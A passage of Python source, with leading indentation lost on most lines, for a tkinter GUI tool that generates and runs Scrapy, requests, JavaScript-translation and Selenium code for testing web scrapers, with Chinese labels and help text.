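        #         return scrapy.Request('http://www.example.com/heartbeat', dont_filter=True)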
# 'scrapy.extensions.logstats.LogStats': None,
# 关闭 scrapy EXTENSIONS默认中间件方式如上,程序执行时,日志的头部有当前任务都有哪些中间件加载,按需在对应管道中配置为 None 即可关闭
# 同理 SPIDER_MIDDLEWARES / DOWNLOADER_MIDDLEWARES 这两个“中间件配置”字典也可以用相同的方式关掉 scrapy 默认组件
# 【*】注意:不同分类的默认中间件需在对应分类的“中间件配置”字典中配置才能关闭,
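        # e.g. (illustrative) a stock downloader middleware is disabled in DOWNLOADER_MIDDLEWARES, not here:
        #   'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,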
},'''
# 生成代码临时放在这里
def scrapy_code_window(setting=None):
fr = Frame()
ft = Font(family='Consolas',size=10)
if setting.get('type') == 'request':
va,prox = setting.get('fr_proxy')
proxy = prox.get().strip() if va.get() else None
if setting.get('type') == 'response':
proxy = setting.get('fr_setting').get('proxy')
if proxy and setting.get('code_string'):
rep = "proxy = None # 'http://127.0.0.1:8888'"
rpl = "proxy = 'http://" +proxy+ "'"
setting['code_string'] = setting['code_string'].replace(rep, rpl)
def _execute_scrapy_code(*a):
from .tab import execute_scrapy_code
execute_scrapy_code()
def _execute_code(*a):
from .tab import execute_code
execute_code()
def save_project_in_desktop(*a):
name = askstring('项目名称','请输入项目名称,尽量小写无空格。')
if not name: return
desktop = os.path.join(os.path.expanduser("~"),'Desktop\\{}'.format(name))
if not os.path.isdir(desktop):
with open(script,'w',encoding='utf-8') as f:
f.write(tx.get(0.,tkinter.END))
shutil.copytree(scrapypath, desktop)
# if hva.get():
# with open(desktop + '\\v\\spiders\\v.py','a',encoding='utf-8') as f:
# f.write('\n'*10 + post_verification_model)
toggle = tkinter.messagebox.askokcancel('创建成功',
'创建成功\n\n'
'注意!!!\n注意!!!\n注意!!!\n\n是否关闭当前工具并启动拷贝出的 shell 地址执行测试。\n'
'如果是,启动第一次shell测试后,后续需要再执行新的测试时请输入:\nscrapy crawl v\n\n'
'{}'.format(desktop))
if not toggle:
return
# cmd = 'start explorer {}'.format(desktop) # 打开文件路径
# os.system(cmd)
pyscript = os.path.join(os.path.split(sys.executable)[0],'Scripts')
toggle = any([True for i in os.listdir(pyscript) if 'scrapy.exe' in i.lower()])
if toggle:
scrapyexe = os.path.join(pyscript,'scrapy.exe')
output = '-o {}'.format(et.get()) if va.get() else ''
cwd = os.getcwd()
os.chdir(desktop)
try:
cmd = 'start powershell -NoExit "{}" crawl v -L {} {}'.format(scrapyexe,cbx.get(),output)
os.system(cmd)
except:
cmd = 'start cmd /k "{}" crawl v -L {} {}'.format(scrapyexe,cbx.get(),output)
os.system(cmd)
os.chdir(cwd)
cwd = os.getcwd()
else:
einfo = 'cannot find scrapy'
tkinter.messagebox.showinfo('Error',einfo)
raise EnvironmentError(einfo)
exit()
else:
tkinter.messagebox.showwarning('文件夹已存在','文件夹已存在')
def save_script_in_desktop(*a):
name = askstring('脚本名','请输入脚本文件名,尽量小写无空格。')
if not name: return
if not name.endswith('.py'): name += '.py'
desktop_script = os.path.join(os.path.expanduser("~"),'Desktop\\{}'.format(name))
if not os.path.isfile(desktop_script):
with open(desktop_script, 'w', encoding='utf-8') as f:
f.write(tx.get(0.,tkinter.END))
else:
tkinter.messagebox.showwarning('脚本已存在','脚本已存在')
home = os.environ.get('HOME')
home = home if home else os.environ.get('HOMEDRIVE') + os.environ.get('HOMEPATH')
filename = '.vrequest_scrapy'
scrapypath = os.path.join(home,filename)
scriptpath = os.path.join(scrapypath, 'v/spiders/')
script = os.path.join(scriptpath, 'v.py')
def local_collection(*a):
def _show(*a, stat='show'):
try:
if stat == 'show': et.pack(side=tkinter.RIGHT)
if stat == 'hide': et.pack_forget()
except:
pass
_show(stat='show') if va.get() else _show(stat='hide')
def _add_single_script_file_save(*a):
script = tx.get(0.,tkinter.END).rstrip('\n')
tx.delete(0.,tkinter.END)
if 'os.path.join(os.path.expanduser("~")' not in script:
script = re.sub('\n p = CrawlerProcess', '\n' + single_script_comment_part1 + '\n\n p = CrawlerProcess', script)
tx.insert(0.,script)
tx.see(tkinter.END)
def _add_single_script_comment(*a):
script = tx.get(0.,tkinter.END).rstrip('\n')
tx.delete(0.,tkinter.END)
# if 'os.path.join(os.path.expanduser("~")' not in script:
# script = re.sub('\n p = CrawlerProcess', '\n' + single_script_comment_part1 + '\n\n p = CrawlerProcess', script)
if 'VImagePipeline' not in script:
# script = re.sub(r'p\.crawl\(VSpider\)', 'p.crawl(VSpider)\n\n' + single_script_comment_part2 + '\n', script)
script = script.replace(r'p.crawl(VSpider)', 'p.crawl(VSpider)\n\n' + single_script_comment_part2 + '\n')
tx.insert(0.,script)
tx.see(tkinter.END)
def _add_single_script_comment_new(*a):
script = tx.get(0.,tkinter.END).rstrip('\n')
tx.delete(0.,tkinter.END)
# if 'os.path.join(os.path.expanduser("~")' not in script:
# script = re.sub('\n p = CrawlerProcess', '\n' + single_script_comment_part1 + '\n\n p = CrawlerProcess', script)
if 'scrapy.utils.deprecate.update_classpath = _update_classpath' not in script:
key = "'DOWNLOAD_DELAY': 1, # 全局下载延迟,这个配置相较于其他的节流配置要直观很多"
script = script.replace(key, key+'\n'+_single_script_middleware_new2)
script = _single_script_middleware_new + '\n'*16 + script
tx.insert(0.,script)
tx.see(tkinter.END)
def _add_single_script_distributed_comment(*a):
script = tx.get(0.,tkinter.END).rstrip('\n')
tx.delete(0.,tkinter.END)
if "hook_to_scrapy_redis(namespace='default')" not in script:
script = _single_distributed + script
tx.insert(0.,script)
tx.see(tkinter.END)
def _add_middleware_script_and_so_on(*a):
from .tab import nb
from .tab import SimpleDialog
q = [ '【推荐】新版单脚本添加中间件方式(支持原版排序)',
'【不推荐】旧版单脚本添加中间件方式(不支持用原版排序)',
'增加单脚本分布式的处理(代码增加在头部,详细使用请看注释)',
'增加列表请求(尚在开发,不好解释用途,不会影响原始代码)',
'增加绝对地址保存文件方式(win 系统 filename 使用绝对地址需加前缀)']
d = SimpleDialog(nb,
text="请选择一个增强功能",
buttons=q,
default=0,
cancel=-1,
title="选择")
id = d.go()
if id == -1: return
if id == 0: _add_single_script_comment_new()
if id == 1: _add_single_script_comment()
if id == 2: _add_single_script_distributed_comment()
if id == 3: _add_sceeper_in_list_model()
if id == 4: _add_single_script_file_save()
def _add_sceeper_in_list_model(*a):
script = tx.get(0.,tkinter.END).rstrip('\n')
if "meta['_plusmeta'] = {}" not in script:
q = re.findall(r'\n d\["([^"]+)"\] *=', script)
if not q: return
from .tab import nb
from .tab import SimpleDialog
d = SimpleDialog(nb,
text="请选择作为下一级请求链接的字段",
buttons=q,
default=0,
cancel=-1,
title="选择")
id = d.go()
if id == -1: return
script = script.replace(''' # If you need to parse another string in the parsing function.''',
''' _meta = response.meta.get('_plusmeta') or {}\n # If you need to parse another string in the parsing function.''')
script = script.replace('''meta = {}\n meta['proxy'] = self.proxy\n r = Request(''',
'''meta = {}\n meta['proxy'] = self.proxy\n meta['_plusmeta'] = {} # keys word transfer\n r = Request(''')
if 'from urllib.parse import unquote_plus, quote_plus' not in script:
_tempstring = _main_2_list_2_info_model.replace('lambda i:i.group(1)+quote_plus(unquote_plus(i.group(2)))', 'lambda i:i.group(1)+quote(unquote(i.group(2)))')
else:
_tempstring = _main_2_list_2_info_model
script = script.replace('''print('------------------------------ split ------------------------------')\n import pprint\n pprint.pprint(d)\n yield d''',
'''# print('------------------------------ split ------------------------------')\n # import pprint\n # pprint.pprint(d)\n # yield d''' \
+ _tempstring.replace("response.urljoin(d['href'])", "response.urljoin(d['{}'])".format(q[id])))
tx.delete(0.,tkinter.END)
tx.insert(0.,script)
tx.see(tkinter.END)
def pprint(*a):
__org_stdout__.write(str(a)+'\n')
__org_stdout__.flush()
temp_fr0 = Frame(fr)
va = tkinter.IntVar()
rb = Checkbutton(temp_fr0,text='本地执行是否收集数据',variable=va,command=local_collection)
rb.deselect()
et = Entry (temp_fr0,width=60)
ltime = '%04d%02d%02d-%02d%02d%02d' % time.localtime()[:6]
dtopfile = os.path.join('file:///' + os.path.expanduser("~"),'Desktop\\v{}.json'.format(ltime))
et.insert(0,dtopfile)
bt2 = Button(temp_fr0,text='保存单脚本到桌面',command=save_script_in_desktop)
bt2.pack(side=tkinter.LEFT)
bt3 = Button(temp_fr0,text='保存项目文件到桌面',command=save_project_in_desktop)
bt3.pack(side=tkinter.LEFT)
btn1 = Button(temp_fr0, text='执行项目代码 [Alt+w]', command=_execute_scrapy_code)
btn1.pack(side=tkinter.LEFT)
btn1_1 = Button(temp_fr0, text='窗口执行代码 [Alt+v]', command=_execute_code)
btn1_1.pack(side=tkinter.LEFT)
btn2 = Button(temp_fr0, text='【单脚本中间件/管道】', command=_add_middleware_script_and_so_on)
btn2.pack(side=tkinter.LEFT)
# btn2 = Button(temp_fr0, text='增加单脚本中间件功能', command=_add_single_script_comment)
# btn2.pack(side=tkinter.LEFT)
# btn2 = Button(temp_fr0, text='增加单脚本分布式功能', command=_add_single_script_distributed_comment)
# btn2.pack(side=tkinter.LEFT)
# btn4 = Button(temp_fr0, text='增加列表请求', command=_add_sceeper_in_list_model)
# btn4.pack(side=tkinter.LEFT)
# hva = tkinter.IntVar()
# hrb = Checkbutton(temp_fr0,text='拷贝项目增加后验证模板',variable=hva)
# hrb.deselect()
# hrb.pack(side=tkinter.LEFT)
cbx = Combobox(temp_fr0,width=10,state='readonly')
cbx['values'] = ('DEBUG','INFO','WARNING','ERROR','CRITICAL')
cbx.current(1)
cbx.pack(side=tkinter.RIGHT)
lab1 = Label(temp_fr0, text='项目启动日志等级:')
lab1.pack(side=tkinter.RIGHT)
def open_test(*a):
cmd = 'start explorer {}'.format(scrapypath)
os.system(cmd)
bt1 = Button(temp_fr0,text='打开本地文件路径',command=open_test)
bt1.pack(side=tkinter.RIGHT)
rb.pack(side=tkinter.RIGHT)
temp_fr1 = Frame(fr)
temp_fr0.pack(fill=tkinter.X)
temp_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
tx = Text(temp_fr1,height=1,width=1,font=ft)
cs = setting.get('code_string')
if cs:
tx.delete(0.,tkinter.END)
tx.insert(0.,cs)
tx.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
try:
from idlelib.colorizer import ColorDelegator
from idlelib.percolator import Percolator
p = ColorDelegator()
Percolator(tx).insertfilter(p)
except:
traceback.print_exc()
def execute_func_console():
if os.path.isdir(scriptpath):
with open(script,'w',encoding='utf-8') as f:
f.write(tx.get(0.,tkinter.END))
pyscript = os.path.join(os.path.split(sys.executable)[0],'Scripts')
toggle = any([True for i in os.listdir(pyscript) if 'scrapy.exe' in i.lower()])
if toggle:
scrapyexe = os.path.join(pyscript,'scrapy.exe')
output = '-o {}'.format(et.get()) if va.get() else ''
cwd = os.getcwd()
os.chdir(scriptpath)
try:
cmd = 'start powershell -NoExit "{}" crawl v -L {} {}'.format(scrapyexe,cbx.get(),output)
os.system(cmd)
except:
cmd = 'start cmd /k "{}" crawl v -L {} {}'.format(scrapyexe,cbx.get(),output)
os.system(cmd)
os.chdir(cwd)
else:
einfo = 'cannot find scrapy'
tkinter.messagebox.showinfo('Error',einfo)
raise EnvironmentError(einfo)
else:
einfo = 'cannot find path: {}'.format(scriptpath)
tkinter.messagebox.showinfo('Error',einfo)
raise EnvironmentError(einfo)
temp_fr2 = Frame(fr,highlightthickness=lin)
lb = Label (temp_fr2,text='执行结果[Esc 显示/隐藏执行结果]')
cd = Text (temp_fr2,height=1,width=1,font=ft)
lb.pack(side=tkinter.TOP)
cd.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
# 在 tkinter 里面实现线程真的稍微有点累人的。
import queue
Q = queue.Queue() # 用来传递打印的数据
S = queue.Queue() # 用来传递脚本数据
def execute_func_window():
# 额外的线程有一个非常需要注意的地方,就是涉及到任何使用 tkinter 内的结构的时候一定不能在这里实现
# 一定都要使用 Queue 来传递参数。窗口自己带一个超级递归的循环。
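        # The pattern in miniature (illustrative only): background threads may ONLY touch the queues,
        #   Q.put('some output line')        # from any worker thread
        # while the Tk side drains them from a self-rescheduling callback,
        #   nb.after(200, loop_in_tkinter)   # so every widget call happens on the Tk main loop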
nonlocal Q, S
Q.put('V|GETSCRIPT')
cs = S.get()
td = tempfile.mkdtemp()
tf = os.path.join(td,'temp.py')
with open(tf,'w',encoding='utf-8') as f:
cs = cs.replace("# import io, sys; sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')", "import io, sys; sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')")
f.write(cs)
s = sys.executable
s = s + ' ' + tf
import subprocess
p = subprocess.Popen(s, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, encoding='utf-8')
Q.put('V|DELETE')
Q.put('============================== start ==============================\n')
for line in iter(p.stdout.readline, ''):
if line:
Q.put(line)
else:
break
Q.put('============================== end ==============================')
p.wait()
p.stdout.close()
shutil.rmtree(td)
def loop_in_tkinter():
__very_unique_cd__ = None
nonlocal cd, Q, S
from .tab import nb
c = []
while Q.qsize():
try:
i = Q.get_nowait()
if i == 'V|DELETE':
cd.delete(0., tkinter.END)
elif i == 'V|GETSCRIPT':
cs = tx.get(0.,tkinter.END)
S.put(cs)
else:
try:
cd.insert(tkinter.END, i)
except:
cd.insert(tkinter.END, re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',i))
cd.see(tkinter.END)
cd.update()
except queue.Empty:
import traceback
tkinter.messagebox.showinfo('Error',traceback.format_exc())
nb.after(200, loop_in_tkinter)
loop_in_tkinter()
def execute_func():
threading.Thread(target=execute_func_window).start()
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'scrapy'
frame_setting[fr]['execute_func_console'] = execute_func_console
frame_setting[fr]['execute_func'] = execute_func
frame_setting[fr]['fr_temp2'] = temp_fr2
return fr
# 帮助文档
def helper_window():
fr = Frame()
ft = Font(family='Consolas',size=10)
hp = '''
vrequest:
基于 requests 和 lxml 库的爬虫请求测试工具
用于快速发起请求,快速生成且能执行的基于 requests 和 lxml 的代码
也可以生成且能执行 scrapy 代码,不过由于scrapy库依赖过重,该工具不会依赖下载
若需要执行 scrapy 代码,需额外下载 scrapy。
*安装完整功能库(scrapy js2py jsbeautifier cryptography pillow)
通用快捷键 (该处多数功能右键窗口就能实现,只要记得右键窗口任意处即可):
(Ctrl + q) 创建新的请求标签
(Ctrl + j) 创建 js 代码执行窗口
(Ctrl + e) 修改当前标签名字
(Ctrl + w) 关闭当前标签
(Ctrl + h) 创建帮助标签
(Ctrl + s) 保存当前全部请求配置(只能保存请求配置)
(Ctrl + `) 直接打开IDLE
(Alt + `) 用IDLE固定打开一个文件,方便长脚本测试
请求窗口快捷键:
(Ctrl + r) 发送请求任务并保存
*(Alt + c) 生成请求代码(一般建议在请求后处理分析再生成代码,那样包含解析代码)
HEADERS 窗口接受 “:” 或 “=” 每行分割生成 字典参数
BODY 窗口接受 “:” 或 “=” 每行分割生成 字典参数
注意:对于 BODY 有时也会存在这里不需要对 dict 进行 urlencode 编码
的情况,这时候只要将传入的一行数据前后加上英文的双引号
程序会自动不对该 dict 进行编码,POST 请求时请留意该功能
*(Alt + s) 生成 scrapy 请求代码,格式化结构同上
*(Alt + u) 生成 urllib 请求代码,格式化结构同上
响应窗口快捷键:
*(Alt + r) 打开一个空的响应标签(不建议在响应窗口使用)
(Alt + f) 智能解析列表路径,解析后使用 xpath 解析功能会自动弹出解析选择窗
(Alt + x) <代码过程> 使用 xpath 解析
(Alt + z) <代码过程> 智能提取 json 列表(由长到短顺序排列,不选默认第一条)
(Alt + q) <代码过程> 选择一个 json 列表
(Alt + d) <代码过程> 获取纯文字内容
(Alt + c) 生成请求代码,有<代码过程>则生成代码中包含过程代码
(Alt + s) 生成 scrapy 请求代码,有<代码过程>则生成代码中包含过程代码
(Alt + u) 生成 urllib 请求代码,不包含过程(解析过程必依赖lxml,与无依赖理念冲突)
(Esc) 开启/关闭 response 解析窗口
代码窗口快捷键:
(Alt + v) 代码执行 [在js代码窗同样适用]
(Esc) 开启/关闭 代码执行结果窗口 [在js代码窗同样适用]
scrapy 代码窗口快捷键:
(Alt + w) scrapy 代码执行
开源代码:
https://github.com/cilame/vrequest
赞助作者:
右键该窗口 -> “创建便捷加密编码窗口” -> “爆破;RSA;二维码” -> “赞助作者”
'''
temp_fr1 = Frame(fr,highlightthickness=lin)
def create_req_window(*a):
from .tab import create_new_reqtab
create_new_reqtab()
def creat_shortcut(*a):
from .tab import creat_windows_shortcut
creat_windows_shortcut()
def pip_install_allfunc(*a):
from .tab import pipinstall_all
pipinstall_all()
fr1 = Frame(fr)
fr1.pack()
btn = Button(fr1,text='创建请求窗口/[右键创建请求窗口]', command=create_req_window)
btn.pack(side=tkinter.LEFT)
btn = Button(fr1,text='创建桌面快捷方式', command=creat_shortcut)
btn.pack(side=tkinter.LEFT)
btn = Button(fr1,text='安装完整功能库', command=pip_install_allfunc)
btn.pack(side=tkinter.LEFT)
lb1 = ttk.Label(temp_fr1,font=ft,text=hp)
lb1.pack()
temp_fr1.pack()
return fr
def exec_js_window(setting=None):
'''
这里可能会使用两到三种js的加载方式,并且,js2py能生成 python 的代码,可能需要考虑生成python代码的功能
目前暂时没有完全实现
'''
fr = Frame()
ft = Font(family='Consolas',size=10)
# js代码转python代码
def translate_js_js2py():
jscode = txt1.get(0.,tkinter.END)
try:
import js2py
js2pycode = js2py.translate_js(jscode)
txt2.delete(0.,tkinter.END)
txt2.insert(0.,js2pycode)
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
def translate_js_python():
try:
from . import pysimplejs2python
except:
import pysimplejs2python
jscode = txt1.get(0.,tkinter.END)
try:
import jsbeautifier
jscode = txt1.get(0.,tkinter.END)
btjscode = jsbeautifier.beautify(jscode)
pycode = pysimplejs2python.simplejs2python(btjscode)
txt2.delete(0.,tkinter.END)
txt2.insert(0.,pycode)
except ImportError as e:
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
def get_script_from_tree(tree):
from .main import escodegen
if escodegen is None:
import js2py.py_node_modules.escodegen as escodegen
escodegen = escodegen.var.get('escodegen')
generate = escodegen.get('generate')
return generate(tree).to_python()
def make_js_tree():
try:
import pyjsparser
jscode = txt1.get(0.,tkinter.END)
tree = pyjsparser.parse(jscode)
txt2.delete(0.,tkinter.END)
txt2.insert(0.,json.dumps(tree, indent=4))
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
def defusion_js_code():
try:
try:
from .pyjsdefusion import get_node_ctx
except:
from pyjsdefusion import get_node_ctx
jscode = txt1.get(0.,tkinter.END)
ctx = get_node_ctx()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,ctx.call('muti_process_defusion', jscode))
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
def make_js_script():
from .tab import show_code_log
show_code_log()
try:
jstree = txt2.get(0.,tkinter.END)
script = get_script_from_tree(json.loads(jstree))
cd.delete(0.,tkinter.END)
cd.insert(0.,script)
except:
e = traceback.format_exc()
cd.delete(0.,tkinter.END)
cd.insert(0.,e)
def change_module(*a):
tp = cbx.get().strip()
        btn_create_python_code['text'] = re.sub(r'\[[^\[\]+]*\]', '[' + tp + ']', btn_create_python_code['text'])
def translate_js():
tp = cbx.get().strip()
jscode = txt1.get(0.,tkinter.END)
if 'execjs' in tp:
pythoncode = """
#coding=utf-8
jscode = r'''
$^^$jscode$^^$
'''
import execjs
ctx = execjs.compile(jscode)
result = ctx.call('func',10,20) # 执行函数,需要传参函数将参从第二个开始依次排在方法名后面
# result = ctx.eval('func(22,33)')
print(result)
""".replace('$^^$jscode$^^$', jscode.strip()).strip()
if 'js2py' in tp:
pythoncode = """
#coding=utf-8
jscode = r'''
$^^$jscode$^^$
'''
import js2py
# js = js2py.eval_js(jscode)
# 这里的 js 是代码执行后最后一个 var 赋值的参数返回出来。
# print(js) # 这种模式有弊端,每次都要解析一遍。
# 请尽量使用下面的方式,这样可以直接用 . 调用内部函数或参数
js = js2py.EvalJs()
js.execute(jscode)
print(js.a)
print(js.func)
""".replace('$^^$jscode$^^$', jscode.strip()).strip()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,pythoncode)
import queue
Q = queue.Queue()
S = queue.Queue()
def exec_javascript(*a):
def _temp():
__very_unique_cd__ = None
nonlocal cd
nonlocal Q, S
Q.put('V|GETSCRIPT')
cs = S.get()
td = tempfile.mkdtemp()
tf = os.path.join(td,'temp.py')
with open(tf,'w',encoding='utf-8') as f:
f.write(cs)
s = sys.executable
s = s + ' ' + tf
import subprocess
p = subprocess.Popen(s, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, encoding='utf-8')
Q.put('V|DELETE')
Q.put('============================== start ==============================\n')
for line in iter(p.stdout.readline, ''):
if line:
Q.put(line)
else:
break
Q.put('============================== end ==============================')
p.wait()
p.stdout.close()
shutil.rmtree(td)
threading.Thread(target=_temp).start()
def loop_in_tkinter():
__very_unique_cd__ = None
nonlocal cd, Q, S
from .tab import nb
c = []
while Q.qsize():
try:
i = Q.get_nowait()
if i == 'V|DELETE':
cd.delete(0., tkinter.END)
elif i == 'V|GETSCRIPT':
cs = txt2.get(0.,tkinter.END)
S.put(cs)
else:
try:
cd.insert(tkinter.END, i)
except:
cd.insert(tkinter.END, re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',i))
cd.see(tkinter.END)
cd.update()
except:
import traceback
tkinter.messagebox.showinfo('Error',traceback.format_exc())
nb.after(200, loop_in_tkinter)
loop_in_tkinter()
def _exec_javascript(*a):
from .tab import show_code_log
show_code_log()
exec_javascript()
def js_beautify(*a):
try:
import jsbeautifier
jscode = txt1.get(0.,tkinter.END)
btjscode = jsbeautifier.beautify(jscode)
txt1.delete(0.,tkinter.END)
txt1.insert(0.,btjscode)
except ImportError as e:
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
except:
einfo = traceback.format_exc() + \
'\n\njs代码美化在一些极端的 eval 函数美化时会出现一些问题' + \
'\n所以出现错误时可以考虑检查代码的 eval 函数的处理'
txt2.delete(0.,tkinter.END)
txt2.insert(0.,einfo)
def save_script_in_desktop(*a):
name = askstring('脚本名','请输入脚本文件名,尽量小写无空格。')
if not name: return
if not name.endswith('.py'): name += '.py'
desktop_script = os.path.join(os.path.expanduser("~"),'Desktop\\{}'.format(name))
if not os.path.isfile(desktop_script):
with open(desktop_script, 'w', encoding='utf-8') as f:
f.write(txt2.get(0.,tkinter.END))
else:
tkinter.messagebox.showwarning('脚本已存在','脚本已存在')
# 查看常用的js解析器的引入状态
support_modules = ['js2py', 'execjs']
def get_js_import_stat(support_modules):
s = []
def _temp(module):
try:
__import__(module)
s.append('+ Enable Use [{}] js driver.'.format(module))
except:
s.append('- Unable Use [{}] js driver.'.format(module))
for module in support_modules:
_temp(module)
return s
import_stat = get_js_import_stat(support_modules)
temp_fr0 = Frame(fr)
temp_fr0.pack(fill=tkinter.X)
import_modules = [i[i.find('['):i.rfind(']')+1] for i in import_stat if i.startswith('+')]
if not import_modules:
einfo = 'unfind any of {} module.'.format(support_modules)
tkinter.messagebox.showinfo('Error',einfo)
raise EnvironmentError(einfo)
cbx = Combobox(temp_fr0,width=13,state='readonly')
cbx['values'] = import_modules
cbx.current(0)
cbx.pack(fill=tkinter.X,side=tkinter.LEFT)
cbx.bind('<<ComboboxSelected>>', change_module)
btn_js_beautify = Button(temp_fr0,text='js代码美化',command=js_beautify)
btn_js_beautify.pack(side=tkinter.LEFT)
btn_create_python_code = Button(temp_fr0,text='生成python[]代码 [Alt+c]',command=translate_js)
btn_create_python_code.pack(side=tkinter.LEFT)
btn_translate_js = Button(temp_fr0,text='翻译成[js2py]代码',command=translate_js_js2py)
btn_translate_js.pack(side=tkinter.LEFT)
btn_translate_js2python = Button(temp_fr0,text='简单js代码翻译成[python]代码(可能有错误)',command=translate_js_python)
btn_translate_js2python.pack(side=tkinter.LEFT)
btn2 = Button(temp_fr0, text='[执行代码] <Alt+v>', command=_exec_javascript)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='保存脚本到桌面', command=save_script_in_desktop)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='用语法树生成代码', command=make_js_script)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='生成语法树', command=make_js_tree)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='使用node简单逆混肴代码', command=defusion_js_code)
btn2.pack(side=tkinter.RIGHT)
temp_fr0 = Frame(fr)
temp_fr0.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr1 = Frame(temp_fr0)
temp_fr1_1 = Frame(temp_fr1)
temp_fr1_1.pack(side=tkinter.TOP)
temp_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
txt1 = Text(temp_fr1,height=1,width=1,font=ft)
lab1 = Label(temp_fr1_1,text='js代码')
lab1.pack(side=tkinter.TOP)
txt1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr2 = Frame(temp_fr0)
temp_fr2_1 = Frame(temp_fr2)
temp_fr2_1.pack(fill=tkinter.X,side=tkinter.TOP)
temp_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.RIGHT)
lab1 = Label(temp_fr2_1,text='python代码')
lab1.pack(side=tkinter.TOP)
txt2 = Text(temp_fr2,height=1,width=1,font=ft)
txt2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr3 = Frame(fr)
lab3 = Label(temp_fr3, text='代码结果 [Esc 切换显示状态]')
lab3.pack(side=tkinter.TOP)
cd = Text(temp_fr3,font=ft)
cd.pack(fill=tkinter.BOTH,expand=True)
test_code = '''
// test_code
function func(a,b){
return a+b
}
var a = func(1,3);
'''.strip()
txt1.insert(0.,test_code)
change_module()
try:
from idlelib.colorizer import ColorDelegator
from idlelib.percolator import Percolator
p = ColorDelegator()
Percolator(txt2).insertfilter(p) # txt2 是js2py生成的python代码,需要填色
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'js'
frame_setting[fr]['execute_func0'] = translate_js
frame_setting[fr]['execute_func1'] = translate_js_js2py
frame_setting[fr]['execute_func'] = exec_javascript
frame_setting[fr]['import_stat'] = import_stat
frame_setting[fr]['fr_temp2'] = temp_fr3 # 代码执行框,这里仍需挂钩esc按键显示/关闭该窗口
return fr
def selenium_test_window(setting=None):
'''
快速使用临时的 selenium 启动浏览器并且快速将某些操作自动化处理
'''
fr = Frame()
ft = Font(family='Consolas',size=10)
def print(*a):
from .tab import show_code_log
try:
show_code_log()
txt = ' '.join(map(str,a)) + '\n'
cd.insert(tkinter.END,re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',txt))
cd.see(tkinter.END)
cd.update()
except:
pass
temp_fr0 = Frame(fr)
temp_fr0.pack(fill=tkinter.X)
def get_webdriver():
local = {'get_driver_func':None}
exec(txt2.get(0.,tkinter.END)+'\nlocal["get_driver_func"] = get_driver', None, {'local':local})
get_driver_func = local['get_driver_func']
return get_driver_func()
driver = None
def start_selenium(*a):
nonlocal driver
def _():
nonlocal driver
if driver is None:
print('预备启动,请等待获取 driver 对象。')
driver = 'None' # 启动浏览器为耗时操作,这里用了多线程,所以要防启动间隙多次启动
try:
import subprocess
_bak_Popen = subprocess.Popen
def _Popen(*a, **kw):
kw['creationflags'] = 0x08000000
return _bak_Popen(*a, **kw)
subprocess.Popen = _Popen
driver = get_webdriver()
print('启动成功,可以在代码窗使用 driver 对象代码。')
except:
print(traceback.format_exc())
finally:
subprocess.Popen = _bak_Popen
else:
tkinter.messagebox.showwarning('警告','浏览器driver已启动,如需重启,先关闭。')
threading.Thread(target=_).start()
def close_selenium(*a):
nonlocal driver
def _():
nonlocal driver
if driver is not None and driver != 'None':
_driver = driver
try:
try: print('正在关闭,请等待片刻。')
except: pass
driver = 'None'
_driver.quit()
driver = None
print('关闭成功,代码窗口将不能使用 driver 对象。')
except:
print(traceback.format_exc())
elif driver == 'None':
clear_selenium_driver()
else:
print('警告','不存在已启动的浏览器')
threading.Thread(target=_).start()
def clear_selenium_driver(*a):
nonlocal driver
os.popen('taskkill /f /im chromedriver.exe /t')
driver = None
def execute_selenium_code(*a):
nonlocal print, driver
code = txt1.get(0., tkinter.END)
local = {'print':print, 'driver':driver}
try:
exec(code, None, local)
except:
print(traceback.format_exc())
def save_script_in_desktop(*a):
name = askstring('脚本名','请输入脚本文件名,尽量小写无空格。')
if not name: return
if not name.endswith('.py'): name += '.py'
desktop_script = os.path.join(os.path.expanduser("~"),'Desktop\\{}'.format(name))
if not os.path.isfile(desktop_script):
with open(desktop_script, 'w', encoding='utf-8') as f:
script = txt2.get(0.,tkinter.END) + '\ndriver = get_driver()\n'
script += txt1.get(0.,tkinter.END) + '\ndriver.quit()'
f.write(script)
else:
tkinter.messagebox.showwarning('脚本已存在','脚本已存在')
def add_script(*a):
if '常见用法,某些窗口输入内容,并点击提交' not in txt1.get(0., tkinter.END):
txt1.insert(tkinter.END, '''
# 常见用法,请求某个网页,在某个输入框输入内容,点击提交按钮
driver.get('http://baidu.com')
driver.find_element_by_xpath('//*[@id="kw"]').clear()
driver.find_element_by_xpath('//*[@id="kw"]').send_keys('123123')
